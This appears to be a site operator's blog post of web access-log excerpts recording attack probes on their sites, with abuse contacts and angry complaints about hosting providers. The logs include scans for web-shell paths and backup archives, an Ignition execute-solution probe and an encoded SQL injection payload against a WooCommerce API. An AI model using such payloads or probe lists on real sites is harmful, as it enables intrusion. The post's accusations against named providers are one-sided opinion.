13.79.223.58 website*x.de – – [09/Aug/2025:04:37:00 +0200] „GET /randkeyword.PhP7 HTTP/1.0“ 403 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:00 +0200] „GET /wp-includes/css/index.php HTTP/1.0“ 403 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:00 +0200] „GET /hehehehe.php HTTP/1.0“ 302 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:01 +0200] „GET /chosen.php HTTP/1.0“ 302 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:01 +0200] „GET /wp-content/plugins/admin.php HTTP/1.0“ 403 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:01 +0200] „GET /wp-content/themes/about.php HTTP/1.0“ 403 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:01 +0200] „GET /wp-links.php HTTP/1.0“ 302 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:01 +0200] „GET /admin/controller/extension/extension/ultra.php HTTP/1.0“ 403 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:01 +0200] „GET /wp-content/uploads/2023/08/ HTTP/1.0“ 403 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:01 +0200] „GET /index/function.php HTTP/1.0“ 403 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:01 +0200] „GET /wp-admin/maint/ HTTP/1.0“ 403 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:01 +0200] „GET /wp-includes/admin.php HTTP/1.0“ 403 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:01 +0200] „GET /wp-includes/Requests/library/ HTTP/1.0“ 403 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:01 +0200] „GET /css.php HTTP/1.0“ 403 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:01 +0200] „GET /wp-content/file.php HTTP/1.0“ 403 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:01 +0200] „GET /wp-content/index.php HTTP/1.0“ 403 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:01 +0200] „GET /flower.php HTTP/1.0“ 302 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:02 +0200] „GET /classwithtostring.php HTTP/1.0“ 302 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:02 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:02 +0200] „GET /mah/function.php HTTP/1.0“ 403 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:02 +0200] „GET /special.php HTTP/1.0“ 302 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:02 +0200] „GET /autoload_classmap.php HTTP/1.0“ 302 – „-“ „-“
13.79.223.58 website*x.de – – [09/Aug/2025:04:37:02 +0200] „GET /images/class-config.php HTTP/1.0“ 403 – „-“ „-“
… and so on…!!!
+
52.164.124.172 website*x.de – – [10/Aug/2025:12:27:57 +0200] „GET /alfanew.php HTTP/1.0“ 302 – „-“ „-“

MAIL NR. 5, Hacking-Attempts from Saturday!

abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,abuse@microsoft.com, msftcs@microsoft.com,azsafety@microsoft.com,

AS16276 – OVH SAS – VERY UNSECURE! – HACKING-ATTEMPTS EVERY DAY! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
2402:1f00:8000:800::f8d website*x.com – – [09/Aug/2025:07:53:53 +0200] „HEAD /archive.zip HTTP/1.0“ 403 – „-“ „-“
2402:1f00:8000:800::f8d website*x.com – – [09/Aug/2025:07:53:54 +0200] „HEAD /Backup.zip HTTP/1.0“ 403 – „-“ „-“
2402:1f00:8000:800::f8d website*x.com – – [09/Aug/2025:07:53:54 +0200] „HEAD /public_html.zip HTTP/1.0“ 403 – „-“ „-“
2402:1f00:8000:800::f8d website*x.com – – [09/Aug/2025:07:53:55 +0200] „HEAD /wordpress.zip HTTP/1.0“ 403 – „-“ „-“

MAIL NR. 6, Hacking-Attempts from Saturday!

abuse@microsoft.com, msftcs@microsoft.com,azsafety@microsoft.com,abuse@m247.ro

AS8075 – Microsoft Corporation – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:47 +0200] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:47 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:47 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:48 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:48 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:48 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:49 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:49 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:49 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:49 +0200] „GET /2018/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:50 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:50 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:50 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:50 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:51 +0200] „GET /media/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:51 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:51 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:51 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
4.240.92.234 website*x.de – – [09/Aug/2025:07:57:52 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“

AS9009 – M247 Europe SRL – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@m247.ro
194.187.251.228 website*x.de – – [09/Aug/2025:13:41:05 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0“

MAIL NR. 7, Hacking-Attempts from Saturday!

abuse@microsoft.com, msftcs@microsoft.com,azsafety@microsoft.com

MAIL NR. 8, Hacking-Attempts from Saturday!

abuse@op-network.net,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de,

AS51396 – Pfcloud UG – VERY UNWANTED PROVIDER! COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@op-network.net – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
Here are we have a 403 WITH 5 IP´S but when it´s a 200, this idiots in this networks start to try to hacking!
2a12:8ec6:7547:474:107f:735c:a789:b68a website*x.com – – [09/Aug/2025:09:18:41 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
2a12:8ec6:7547:474:107f:735c:a789:b68a website*x.com – – [09/Aug/2025:09:18:41 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
+
2a12:8ec6:440e:be92:8d33:60b9:62f5:c108 website*x.com – – [09/Aug/2025:09:18:41 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
2a12:8ec6:440e:be92:8d33:60b9:62f5:c108 website*x.com – – [09/Aug/2025:09:18:41 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
+
2a12:8ec7:2960:71e8:a407:7cc0:f9c9:17a0 website*x.com – – [09/Aug/2025:09:18:42 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
2a12:8ec7:2960:71e8:a407:7cc0:f9c9:17a0 website*x.com – – [09/Aug/2025:09:18:42 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
+
2a12:8ec5:21e9:1ef0:4401:16e4:b68a:1c32 website*x.com – – [09/Aug/2025:09:18:42 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
2a12:8ec5:21e9:1ef0:4401:16e4:b68a:1c32 website*x.com – – [09/Aug/2025:09:18:42 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
+
2a12:8ec6:4dc7:3cc4:2883:64d9:7e34:814f website*x.com – – [09/Aug/2025:09:18:43 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“
2a12:8ec6:4dc7:3cc4:2883:64d9:7e34:814f website*x.com – – [09/Aug/2025:09:18:43 +0200] „GET / HTTP/1.0“ 403 – „http://website*x.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36“

AS51167 – Contabo GmbH – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
207.180.255.216 website*x.com – – [09/Aug/2025:14:46:30 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“
207.180.255.216 website*x.com – – [09/Aug/2025:14:46:30 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15“
207.180.255.216 website*x.com – – [09/Aug/2025:14:46:30 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.google.com/search?q=wordpress“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0“

AS209605 – UAB Host Baltic – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
admin@serveroffer.lt – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
91.224.92.45 website*x.com – – [09/Aug/2025:15:00:43 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com/search?q=wordpress“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
91.224.92.45 website*x.com – – [09/Aug/2025:15:00:43 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“
91.224.92.45 website*x.com – – [09/Aug/2025:15:00:43 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://t.co/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“

MAIL NR. 9, Hacking-Attempts from Saturday!

abuse@m247.ro, abuse@myloc.de,admin@serveroffer.lt

AS24961 – WIIT AG – UNWANTED PROVIDER! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@myloc.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
89.163.242.76 website*x.de – – [09/Aug/2025:08:22:33 +0200] „GET /moddofuns.php HTTP/1.0“ 302 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.de – – [09/Aug/2025:08:23:03 +0200] „GET /moddofuns.php HTTP/1.0“ 302 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS9009 – M247 Europe SRL – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@m247.ro
194.187.251.217 website*x.de – – [09/Aug/2025:09:24:49 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0“

AS209605 – UAB Host Baltic – VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
admin@serveroffer.lt – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
91.224.92.45 website*x.com – – [09/Aug/2025:14:39:27 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“
91.224.92.45 website*x.com – – [09/Aug/2025:14:39:27 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com/search?q=wordpress“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:121.0) Gecko/20100101 Firefox/121.0“
91.224.92.45 website*x.com – – [09/Aug/2025:14:39:27 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0“

MAIL NR. 10, Hacking-Attempts from Saturday!

abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de,abuse@mevspace.com,abuse@microsoft.com, msftcs@microsoft.com,azsafety@microsoft.com

AS141995 – Contabo Asia Private Limited – CONTABO ASIA AGAIN AND AGAIN EVERY DAY! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
194.233.82.231 website*x.com – – [09/Aug/2025:12:33:45 +0200] „HEAD /_ignition/execute-solution HTTP/1.0“ 403 – „-“ „python-requests/2.32.4“
194.233.82.231 website*x.com – – [09/Aug/2025:12:33:46 +0200] „POST /_ignition/execute-solution HTTP/1.0“ 403 – „-“ „python-requests/2.32.4“

AS201814 – MEVSPACE sp. z o.o. VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@mevspace.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
2a03:cfc0:8000:27::c303:df1d website*x.com – – [09/Aug/2025:12:42:21 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36“
2a03:cfc0:8000:27::c303:df1d website*x.com – – [09/Aug/2025:12:42:21 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36“

MAIL NR. 11, Hacking-Attempts from Saturday!

abuse@globaldata-cloud.com

AS42624 – Global-Data System IT Corporation – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@globaldata-cloud.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
185.208.156.238 website*x.com – – [09/Aug/2025:14:35:05 +0200] „GET //wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Ctable%25255fname%252520from%252520information%25255fschema%25252etables%25253B%252500 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36“

MAIL NR. 12, Hacking-Attempts from Saturday!

abuse@ovh.us,abuse@ovh.net, abuse@ovh.ca

AS16276 – OVH SAS – DAILY HACKER-IDIOTS! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.us – ABUSE PER EMAIL IS STANDARD!!!
2604:2dc0:100:3146:: www.website*x.com – – [09/Aug/2025:14:21:48 +0200] „HEAD /backup.zip HTTP/1.0“ 403 – „-“ „-“
2604:2dc0:100:3146:: www.website*x.com – – [09/Aug/2025:14:21:48 +0200] „HEAD /Archive.zip HTTP/1.0“ 403 – „-“ „-“
2604:2dc0:100:3146:: www.website*x.com – – [09/Aug/2025:14:21:49 +0200] „HEAD /gbnadvisors.zip HTTP/1.0“ 403 – „-“ „-“
2604:2dc0:100:3146:: www.website*x.com – – [09/Aug/2025:14:21:49 +0200] „HEAD /gbnadvisors.com.zip HTTP/1.0“ 403 – „-“ „-“

MAIL NR. 13, Hacking-Attempts from Saturday!

admin@frantech.ca,fdias@frantech.ca

AS53667 – FranTech Solutions – VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
admin@frantech.ca,fdias@frantech.ca – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
209.141.32.143 www.website*x.de – – [09/Aug/2025:14:40:13 +0200] „GET /wp-content/plugins/reveal-listing/readme.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.1.2.3 Safari/537.36 Edg/121.0.623.86“

Nun schauen wir mal, welche Provider sich nun verantwortungsbewusst verhalten!

LOGFILE-AUSZÜGE VOM 07.08.25!

Was haben wir uns mal wieder über diese wirklich dummen Hacker-Idioten amüsiert. Diesmal kamen die armseeligen Hacking-Versuche über 4 ISP/PROVIDER in Asien.

Über unser geniales Security-Tool kam eh SOFORT ein 403! Nun sind diese 4 Netzwerke dieser 4 ISP auch komplett auf sehr vielen Websites gesperrt! Mal wieder sind bzgl. unserer 2 mal gesendete ABUSE-MAILS hier besonders IGNORANTE PROVIDER DABEI!

AS27775 – Telecommunicationcompany Suriname – TeleSur – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
lacadmin@telesur.sr – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
2803:a200:8ca:2901:31f2:84d6:f7ba:b289 website*x.com – – [07/Aug/2025:17:57:09 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS9541 – Cyber Internet Services (Pvt) Ltd. – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
noc-abuse@cyber.net.pk – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
2400:adc7:190d:1400:a1f8:20f0:db24:dd9 website*x.com – – [07/Aug/2025:17:57:15 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS24560 – Bharti Airtel Ltd., Telemedia Services – VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ip.misuse@airtel.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
2401:4900:883a:6914:a431:c1a9:dec5:80cc website*x.com – – [07/Aug/2025:17:57:22 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36“

AS210413 – Smart Link Company for Internet Service, special company and limited responsibility – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
info@smartlink-isp.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
45.157.54.23 website*x.com – – [07/Aug/2025:21:53:41 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
45.157.54.23 website*x.com – – [07/Aug/2025:22:07:41 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

Nun schauen wir mal, ob diese MIT VERANTWORTLICHEN PROVIDER ENDLICH REAGIEREN!

Hacker Vollpfosten

LOGFILE-AUSZUG VOM WOCHENENDE – 05.08.25 bis 06.08.25!

Jetzt eine Bemerkung von uns! Provider sind IMMER MIT VERANTWORTLICH! WAS WIR ABSOLUT NICHT MÖGEN, IST EINE IGNORANZ BZGL. UNSERER ABUSE-MAILS!!!

HIER GLÄNZEN EINIGE VOR LAUTER IGNORANZ:

AS206092 – Internet Utilities Europe and Asia Limited
Company: Bandito Networks (Bei Arin eingetragener Provider!)
abuse@bandito.net – Nennt abuse-reports@vpnconsumer.com als Meldeadresse!
Da abuse-reports@vpnconsumer.com schon seit Monaten unsere Abuse-Mails IGNORIERT, EINTRAG IN ROT!!!
216.73.163.100 website*x.com – – [06/Aug/2025:05:58:29 +0200] „GET /wp-admin/js/about.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
216.73.163.100 website*x.com – – [06/Aug/2025:05:58:30 +0200] „GET /wp-includes/Text/wp-login.php HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
216.73.163.100 website*x.com – – [06/Aug/2025:05:58:31 +0200] „GET /wp-admin/network/admin.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
216.73.163.100 website*x.com – – [06/Aug/2025:05:58:34 +0200] „GET /wp-admin/admin.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
216.73.163.100 website*x.com – – [06/Aug/2025:05:58:36 +0200] „GET /wp-admin/function.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
216.73.163.100 website*x.com – – [06/Aug/2025:05:58:38 +0200] „GET /wp-links.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
216.73.163.100 website*x.com – – [06/Aug/2025:05:58:39 +0200] „GET /wp-includes/css/dist/edit-widgets/ HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
216.73.163.100 website*x.com – – [06/Aug/2025:05:58:41 +0200] „GET /wp-mail.php HTTP/1.0“ 302 20 „-“ „Go-http-client/1.1“
216.73.163.100 website*x.com – – [06/Aug/2025:05:58:42 +0200] „GET /wp-includes/theme-compat/ HTTP/1.0“ 403 – „-“ „Go-http-client/1.1“
… etc und etc…

AS48693 – Rices Privately owned enterprise – WEGEN DER IGNORANZ ALS SEHR UNSICHERER PROVIDER EINGESTUFT!
abuse@ntup.net – ABSOLUT IGNORANT! – KEINERLEI REAKTION BZGL. UNSERER ABUSE-MAILS SEIT MONATEN!!!
194.145.227.125 website*x.com – – [06/Aug/2025:13:12:30 +0200] „GET /wp-content/plugins/wp-seo-spy-google/ofc/php-ofc-library/ofc_upload_image.php HTTP/1.0“ 403 – „-“ „ALittle Client“

AS210558 – 1337 Services GmbH – VON UNS AB JETZT WEGEN DER IGNORANZ ALS SEHR UNSICHERER PROVIDER EINGESTUFT!
abuse@as210558.net – ABSOLUT IGNORANT! – KEINERLEI REAKTION BZGL. UNSERER ABUSE-MAILS SEIT MONATEN!!!
194.26.192.48 www.website*x.com – – [05/Aug/2025:03:04:09 +0200] „GET /wp-admin/install.php HTTP/1.0“ 200 1318 „-“ „-“
